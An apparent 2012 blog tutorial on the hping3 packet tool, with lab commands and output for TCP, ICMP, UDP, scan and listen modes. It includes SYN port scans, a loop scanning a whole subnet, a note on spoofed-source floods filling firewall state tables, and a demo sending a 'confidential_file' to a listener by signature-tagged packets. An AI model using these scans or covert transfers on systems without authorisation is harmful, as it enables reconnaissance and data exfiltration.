Tuesday, January 31, 2012

[DIY] Tools - Using Hping


Here's a quick hping usage tutorial.

From the man page:
hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping program does with ICMP replies. hping3 handle fragmentation, arbitrary packets body and size and can be used in order to transfer files encapsulated under supported protocols. Using hping3 you are able to perform at least the following stuff:
- Test firewall rules
- Advanced port scanning
- Test net performance using different protocols, packet size, TOS (type of service) and fragmentation.
- Path MTU discovery
- Transferring files between even really fascist firewall rules.
- Traceroute-like under different protocols.
- Firewalk-like usage.
- Remote OS fingerprinting.
- TCP/IP stack auditing.
- A lot of others.
Refer to man hping3 and hping3 --help for detailed options & switches.

Let's start with some common base options which are pretty self-explanatory & then move on to modes et all:
root@victor:xd# hping3 --help
usage: hping3 host [options]
-h --help show this help
-v --version show version
-c --count packet count
-i --interval wait (uX for X microseconds, for example -i u1000)
--fast alias for -i u10000 (10 packets for second)
--faster alias for -i u1000 (100 packets for second)
--flood sent packets as fast as possible. Don't show replies.
-n --numeric numeric output
-q --quiet quiet
-I --interface interface name (otherwise default routing interface)
-V --verbose verbose mode
-D --debug debugging info

...snip...
I would like to mention one switch in the IP options category: --rand-source. This hping switch selects the source address of all packets randomly. This can therefore, be used to do (stress) testing stateful firewalls. But it can also potentially fill up the state table, in turn causing legit users & traffic to drop off. So, need to keep this when using this option.

Okay, moving on.

By default, hping sends TCP packets with no tcp flags set, and target host's port 0, continuously. A target system will respond with a RST packet, confirming that it is live.

root@victor:xd# hping3 172.72.5.139
HPING 172.72.5.139 (vmnet1 172.72.5.139): NO FLAGS are set, 40 headers + 0 data bytes
len=40 ip=172.72.5.139 ttl=128 id=32996 sport=0 flags=RA seq=0 win=0 rtt=13.4 ms
len=40 ip=172.72.5.139 ttl=128 id=32997 sport=0 flags=RA seq=1 win=0 rtt=0.7 ms
len=40 ip=172.72.5.139 ttl=128 id=32998 sport=0 flags=RA seq=2 win=0 rtt=0.4 ms
^C
--- 172.72.5.139 hping statistic ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 0.4/4.8/13.4 ms

There are several modes that we can use hping in. Default mode is TCP.
root@victor:xd# hping3 --help
usage: hping3 host [options]
...
snip
...
Mode
  default mode TCP
  -0 --rawip RAW IP mode
  -1 --icmp ICMP mode
  -2 --udp UDP mode
  -8 --scan SCAN mode.
                   Example: hping --scan 1-30,70-90 -S www.target.host
  -9 --listen listen mode

...
snip
...

RAW IP mode sends the packets without a TCP or UDP headers. To send raw IP packets to target, use the -0 or --rawip switch:
root@victor:xd# hping3 --rawip 172.72.5.139
HPING 172.72.5.139 (vmnet1 172.72.5.139): raw IP mode set, 20 headers + 0 data bytes
^C
--- 172.72.5.139 hping statistic ---
19 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms


As we see here, the target (& most systems) silently drops the raw ip packets.

With ICMP mode, hping sends ICMP packets to the target. By default, ICMP echo-requests are sent.

root@victor:xd# hping3 --icmp 172.72.5.139
HPING 172.72.5.139 (vmnet1 172.72.5.139): icmp mode set, 28 headers + 0 data bytes
len=28 ip=172.72.5.139 ttl=128 id=309 icmp_seq=0 rtt=3.8 ms
len=28 ip=172.72.5.139 ttl=128 id=310 icmp_seq=1 rtt=0.6 ms
len=28 ip=172.72.5.139 ttl=128 id=311 icmp_seq=2 rtt=0.4 ms
^C
--- 172.72.5.139 hping statistic ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 0.4/1.6/3.8 ms
We can easily set other ICMP type/code by using -K / --icmptype or -C / --icmpcode switches.
root@victor:xd# hping3 --help
usage: hping3 host [options]...
snip
...
ICMP
  -C --icmptype icmp type (default echo request)
  -K --icmpcode icmp code (default 0)
      --force-icmp send all icmp types (default send only supported types)
      --icmp-gw set gateway address for ICMP redirect (default 0.0.0.0)
      --icmp-ts Alias for --icmp --icmptype 13 (ICMP timestamp)
      --icmp-addr Alias for --icmp --icmptype 17 (ICMP address subnet mask)
      --icmp-help display help for others icmp options

...
snip
...

For example to use --icmptype as Timestamp / icmp type 13 code 0:
root@victor:xd# hping3 -c 3 --icmptype 13 172.72.5.139
HPING 172.72.5.139 (vmnet1 172.72.5.139): icmp mode set, 28 headers + 0 data bytes
len=40 ip=172.72.5.139 ttl=128 id=321 icmp_seq=0 rtt=0.9 ms
ICMP timestamp: Originate=78180467 Receive=1459333124 Transmit=1459333124
ICMP timestamp RTT tsrtt=1
len=40 ip=172.72.5.139 ttl=128 id=322 icmp_seq=1 rtt=0.4 ms
ICMP timestamp: Originate=78181468 Receive=1056942084 Transmit=1056942084
ICMP timestamp RTT tsrtt=1
len=40 ip=172.72.5.139 ttl=128 id=323 icmp_seq=2 rtt=0.5 ms
ICMP timestamp: Originate=78182468 Receive=637774084 Transmit=637774084
ICMP timestamp RTT tsrtt=1
--- 172.72.5.139 hping statistic ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 0.4/0.6/0.9 ms

Or use --icmpcode switch:

root@victor:xd# hping3 -c 2 --icmpcode 0 172.72.5.139
HPING 172.72.5.139 (vmnet1 172.72.5.139): icmp mode set, 28 headers + 0 data bytes
len=28 ip=172.72.5.139 ttl=128 id=341 icmp_seq=0 rtt=0.5 ms
len=28 ip=172.72.5.139 ttl=128 id=342 icmp_seq=1 rtt=0.4 ms
--- 172.72.5.139 hping statistic ---
2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max = 0.4/0.5/0.5 ms
Of course, above example shows a ping [icmp type 8 code 0].


Similarly for UDP mode, -2 or --udp switch is used. By default, packets will be sent to target host's port 0.
root@victor:xd# hping3 -c 2 --udp 172.72.5.139
HPING 172.72.5.139 (vmnet1 172.72.5.139): udp mode set, 28 headers + 0 data bytes
ICMP Port Unreachable from ip=172.72.5.139 name=UNKNOWN
status=0 port=1067 seq=0
ICMP Port Unreachable from ip=172.72.5.139 name=UNKNOWN
status=0 port=1068 seq=1
--- 172.72.5.139 hping statistic ---
2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max = 0.6/500.5/1000.3 ms
So, we receive ICMP Port Unreachable, since there is no UDP service running / listening on the target.

Next is the Scan Mode. We can turn to scan mode by using the -8 or --scan switch. A port or range of ports or an alias is expected as an argument. There are 2 aliases supported currently - all and known. 'all' means all ports 0-65535; 'known' will use all the ports listed in /etc/services file.

root@victor:xd# hping3 -8 21,22,23,135,139,445 172.72.5.139
Scanning 172.72.5.139 (172.72.5.139), port 21,22,23,135,139,445
6 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name | flags |ttl| id | win | len |
+----+-----------+---------+---+-----+-----+-----+
All replies received. Done.
Not responding ports:
We did not receive any service identification or confirmation response back from the target host. Or at least we do not know the response details yet.

We can use -V switch to get the response info.
root@victor:xd# hping3 -8 21,22,23,135,139,445 172.72.5.139 -V
using vmnet1, addr: 172.72.5.1, MTU: 1500
Scanning 172.72.5.139 (172.72.5.139), port 21,22,23,135,139,445
6 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name | flags |ttl| id | win | len |
+----+-----------+---------+---+-----+-----+-----+
   21 ftp : ..R.A... 128 44033 0 40
   22 ssh : ..R.A... 128 44289 0 40
   23 telnet : ..R.A... 128 44545 0 40
  135 loc-srv : ..R.A... 128 44801 0 40
  139 netbios-ssn: ..R.A... 128 45057 0 40
  445 microsoft-d: ..R.A... 128 45313 0 40
All replies received. Done.
Not responding ports:
Okay, it appears, that the target host is simply sending a RST ACK to all our scan packets.

Remember that by default, hping will NOT set any TCP flags - SYN, ACK, RST, PSH, URG, FIN. Let's set the SYN flag and scan again.
root@victor:xd# hping3 -8 21,22,23,135,139,445 172.72.5.139 -V -S
using vmnet1, addr: 172.72.5.1, MTU: 1500
Scanning 172.72.5.139 (172.72.5.139), port 21,22,23,135,139,445
6 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name | flags |ttl| id | win | len |
+----+-----------+---------+---+-----+-----+-----+
   21 ftp : .S..A... 128 50177 64240 44
   22 ssh : ..R.A... 128 50433 0 40
   23 telnet : ..R.A... 128 50689 0 40
  135 loc-srv : .S..A... 128 50945 64240 44
  139 netbios-ssn: .S..A... 128 51201 64240 44
  445 microsoft-d: .S..A... 128 51457 64240 44
All replies received. Done.
Not responding ports:
Alright, with SYN packets, we now find that the target responds back with SYN-ACK for some ports and RST-ACK for other ports.
A SYN-ACK implies that the ports [21,135,139,445] are open, whereas a RST-ACK for ports 22, 23 tells us they are closed / no ssh or telnet on the target box.

Now try using the aliases:


root@victor:xd# hping3 -8 known 172.72.5.139 -S
Scanning 172.72.5.139 (172.72.5.139), port known
317 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name | flags |ttl| id | win | len |
+----+-----------+---------+---+-----+-----+-----+
  135 loc-srv : .S..A... 128 25860 64240 44
  139 netbios-ssn: .S..A... 128 26628 64240 44
  445 microsoft-d: .S..A... 128 34820 64240 44
   21 ftp : .S..A... 128 774 64240 44
All replies received. Done.
Not responding ports:


root@victor:xd# hping3 -8 all 172.72.5.139 -S
Scanning 172.72.5.139 (172.72.5.139), port all
65536 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name | flags |ttl| id | win | len |
+----+-----------+---------+---+-----+-----+-----+
21 ftp : .S..A... 128 9127 64240 44
135 loc-srv : .S..A... 128 38311 64240 44
139 netbios-ssn: .S..A... 128 39335 64240 44
445 microsoft-d: .S..A... 128 33214 64240 44
52111 : .S..A... 128 8910 64240 44
All replies received. Done.
Not responding ports: (3130 icpv2) (3131 ) (3132 ) (3133 ) (3134 ) (3135 ) (3136 ) (3137 ) (3138 ) (3139 ) (3140 ) (3141 ) (3142 ) (3143 ) (3144 ) (3145 ) (3146 ) (3147 ) (3148 ) (3149 ) (3150 ) (3151 ) ...snip...

Final mode is the Listen mode, activated by -9 or --listen switch. Basically, when started in listen mode, hping waits] for an incoming packet. hping expects a signature in the incoming packet. Once it finds the signature, hping then dumps the packet, starting -from- the signature -to- the packet end.

For example, on my *nix box, I start hping in listen mode and set the signature as 'JackP0t'. Note that in listen mode, we need to specify the interface to listen on [in case there are multiple interfaces on your box]. Next on the Windows target box, I start hping and give it the file 'confidential_file' as the data input. Remember this data file content will be 'prepended' with the signature 'JackP0t' when it goes out in the packet.
root@victor:xd# hping3 --help
usage: hping3 host [options]...
snip
...
Common
  -d --data data size (default is 0)
  -E --file data from file
  -e --sign add 'signature'
  -j --dump dump packets in hex
  -J --print dump printable characters
  -B --safe enable 'safe' protocol
  -u --end tell you when --file reached EOF and prevent rewind
  -T --traceroute traceroute mode (implies --bind and --ttl 1)
  --tr-stop Exit when receive the first not ICMP in traceroute mode
  --tr-keep-ttl Keep the source TTL fixed, useful to monitor just one hop
  --tr-no-rtt Don't calculate/show RTT information in traceroute mode

...
snip
...
On *nix box:
root@victor:xd# hping3 --listen JackP0t -I vmnet1
hping3 listen mode
[main] memlockall(): Success
Warning: can't disable memory paging!
Secret data.Secret data.Secret data.Secret data.Secret data.Secret data.Secret data.Secret data.Secret data.Secret data.Secret data.Secret data.Secret data.Secret data.Secret data.Secret data.Secret data.
<--- content in the file 'confidential_file' which we sent in the packets. hping listener sees the signature 'JackP0t' and then dumps bytes that follow.
From Windows system:
C:\Documents and Settings\Administrator\Desktop\hping2.win32>hping --data 100 --file confidential_file.txt -e JackP0t 172.72.5.1 -V --end <--- we have set a data size of 100 bytes, specified the file 'confidential_file.txt' as data input, set 'JackP0t' as the signature, used a Verbose option to see responses and lastly, used the --end option to tell us when the file reaches EOF.
using AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport, addr: 172.72.5.139, MTU: 1500
HPING (XPSP2) 172.72.5.1 (AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport 172.72.5.1): NO FLAGS are set, 40 headers + 100 data bytes
[main] memlockall(): No error
Warning: can't disable memory paging!
EOF reached, wait some second than press ctrl+c
len=46 ip=172.72.5.1 ttl=64 DF id=0 tos=0 iplen=40
sport=0 flags=RA seq=0 win=0 rtt=16.0 ms
seq=0 ack=141 sum=7441 urp=0
EOF reached, wait some second than press ctrl+c
len=46 ip=172.72.5.1 ttl=64 DF id=0 tos=0 iplen=40
sport=0 flags=RA seq=1 win=0 rtt=0.0 ms
seq=0 ack=26600 sum=17da urp=0

Do note that hping does NOT allow us to scan or send packets to a range of IP addresses. However, we can automate it using a bit of shell scripting.

Let's say we want to send 1 single SYN packet to all 'known' alias ports on all hosts in 172.72.5.0/24 network. This can be done as follows:
for i in `seq 1 255`; do hping3 --count 1 -8 known -S 172.72.5.$i; done
.....

No comments:

Post a Comment

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.